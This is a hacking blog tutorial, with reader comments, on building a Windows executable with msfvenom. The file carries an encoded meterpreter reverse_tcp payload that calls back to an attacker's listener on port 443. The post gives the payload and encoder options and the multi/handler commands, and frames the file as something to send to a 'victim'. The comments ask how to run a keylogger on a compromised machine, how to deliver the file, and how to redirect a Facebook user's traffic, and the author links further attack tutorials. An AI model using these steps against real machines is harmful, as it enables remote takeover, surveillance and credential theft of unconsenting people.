• 25,450
  • +1,003
  • 2,796
Create Exploit Using Msfvenom to Hack Windows 7 SP1

Create Exploit Using Msfvenom to Hack Windows 7 SP1

Bookmark

Type : Tutorial

Level : Medium

Attacker O.S : Backtrack 5 R2

Victim O.S : Windows 7 SP1

After last tutorial about generating a shellcode using msfpayload, today we will learn to use another Metasploit framework commend line instance called msfvenom.

In this tutorial about create exploit using msfvenom to hack windows 7 sp1, we will make an exploit by using msfvenom and then execute it on victim and we will try to connect to victim computer after that.

Here I get from offensive-security.com about the explanation of msfvenom :

msfvenom is a combination of Msfpayload and msfencode, putting both of these tools into a single framework instance. The advantages of msfvenom are:

  • One single tool
  • Standardized command line options
  • Increased speed

Requirements :

1. Metasploit framework

Step by Step :

1. Open your terminal (CTRL + ALT + T) and type msfvenom -h to view the available options for this tools.

Create Exploit Using Msfvenom to Hack Windows 7 SP1

I think all the explanation above already clear about the usage of this msfvenom.

2. In this tutorial I want to create an exploit generated by msfvenom with meterpreter payload and I also want to encode it using shikata_ga_nai encoder. To know the available options to set up this exploit, you can use -o options after you set up your payload.

Create Exploit Using Msfvenom to Hack Windows 7 SP1

3. Yep there it is, we need to set up the LHOST and LPORT to make this exploit work. My IP address is 192.168.8.91 so I set the LHOST to that IP, and I want to set the LPORT to 443 so I will receive connection from victim on port 443 if the exploit succeed.

Create Exploit Using Msfvenom to Hack Windows 7 SP1

Information :

-p windows/meterpreter/reverse_tcp --> I use meterpreter reverse_tcp for the payload

-e x86/shikata_ga_nai --> encoder that I use for this tutorial

-i 5-b '\x00' --> remove the bad chars

As you can see on above picture, I generate the exploit on Desktop folder and I named it abc.exe.

4. Exploit that successfully generated on step 3, we need to send it to victim later. The next step we need to set up the listener on our attacker computer by using handler.

5. Run your metasploit console by execute msfconsole on your terminal.

6. As I've already say above that I want to use meterpreter reverse_tcp payload, so I need to set it up.

Create Exploit Using Msfvenom to Hack Windows 7 SP1

information :

use exploit/multi/handler --> to handle incoming connection

set payload windows/meterpreter/reverse_tcp --> reverse tcp payload

show options --> show available options to set

7. Now the next step we also need to set up the LHOST and LPORT and make sure it's the same with the one you have set up on step 3.

Create Exploit Using Msfvenom to Hack Windows 7 SP1

our handler ready to receive connection on port 443

8. When you send the exploit to victim, and victim execute it, we got this :

Create Exploit Using Msfvenom to Hack Windows 7 SP1

Pwned!

Countermeasures :

1. Always update your antivirus to the latest version

2. Don't forget to install personal firewall for your PC

Hope it's useful 🙂

Subscribe Now To Get Latest Hacking Tutorial on Your E-Mail

Share this article if you found this post was useful:

Blogger at hacking-tutorial.com. Love PHP, offensive security and web. Contact him at me[-at-]vishnuvalentino.com

See all posts by || Visit Website : http://www.vishnuvalentino.com

  • peter

    the issue im having though with this is, im gaining access via the session, and have control of the victim components.. but im wondering if its possible to execute a keylogger somehow

    • v4L

      #peter
      yes you can http://www./tips-and-trick/5-step-to-capture-windows-user-login-using-metasploit-keylogger/

  • mehdi

    vinshu i wanna use my wan ip i did portforwarding but when i make exploit i get this:
    Handler failed to bind to (my ip):443
    [*] Started reverse handler on 0.0.0.0:443
    [*] Starting the payload handler…

    • v4L

      #mehdi
      It means’ that your 443 port haven’t forwarded yet on your router

  • sush

    Hey.. i’m using vmware for bt5 r3..
    hen i run d file im my pc [ in 7]
    the session opens .. but when gave to my frnd .. he runs it but no session opens ???
    we have to purchase the static ip or wat ??
    nd 1 more qstion – wat wehave to type when we we have to open the session other day [aftr 1 day]
    ans both d qstions pLzz
    shrry mah ‘W’ is not working properly ??dont mind its when* win 7

    • v4L

      #sush
      you can view here : http://www./hacking-tutorial/how-to-hacking-wan-internet-by-using-public-dynamic-ip-address/
      and here : http://www./hacking-tutorial/how-to-do-hacking-the-internet-wan-not-lan-using-metasploit-the-logic/

  • wizz

    How i send abc.exe to victim?? in what form??

  • jayaram

    hai sir dis is jayaram
    i had an dbt i think u can clear it

    me using wifi at col
    i had a small idea

    if suppose my user browses facebook.com it must be redirected to some other sites
    how to do it in btk5r3
    i dr any solution in backtrack for this problem

    plz sir reply to my mail to

    i will wait for ur reply with 1000 eyes

  • mantab mas tutorialnya…… mas gabung di forum saya mas www.indonesianbacktrack.or.id

  • akash thakar

    hey there
    i ma using kali linux 2.0
    i have done all the things correctly as mentioned above.
    but i could not establish connection with the victim computer, meterpreter session could not be open.
    can anyone plese help me???